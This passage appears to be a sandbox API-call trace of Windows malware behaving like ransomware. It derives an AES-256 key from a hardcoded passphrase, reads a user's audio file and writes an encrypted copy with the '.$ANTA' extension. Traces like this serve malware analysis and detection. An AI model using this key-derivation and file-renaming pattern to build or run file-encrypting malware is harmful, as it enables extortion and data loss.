ftCreationTime.dwLowDateTime=0xa4bcbc30, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x7503b690, ftLastAccessTime.dwHighDateTime=0x1d5e1dc, ftLastWriteTime.dwLowDateTime=0x7503b690, ftLastWriteTime.dwHighDateTime=0x1d5e1dc, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="xJgB9.wav", cAlternateFileName="")) returned 0x41ac140 [0111.204] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0111.204] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.205] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0111.269] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0111.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0111.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0111.269] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.270] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0111.270] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca3e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0111.270] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0111.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.270] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0111.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.270] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0111.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca3a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0111.271] CryptHashData (hHash=0x41ac440, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0111.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.271] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0111.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca208, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0111.271] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0111.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0111.271] CryptDestroyHash (hHash=0x41ac440) returned 1 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0111.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0111.272] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0111.272] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0111.272] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.273] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav" (normalized: "c:\\users\\fd1hvy\\music\\xjgb9.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0111.273] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.273] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0111.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0111.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0111.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0111.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0111.273] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0111.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0111.274] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0111.274] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c68 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0111.275] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.276] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\xJgB9.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\xjgb9.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0111.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0111.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.277] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0111.277] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0111.277] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0111.277] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0111.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0111.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0111.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0111.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0111.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.278] 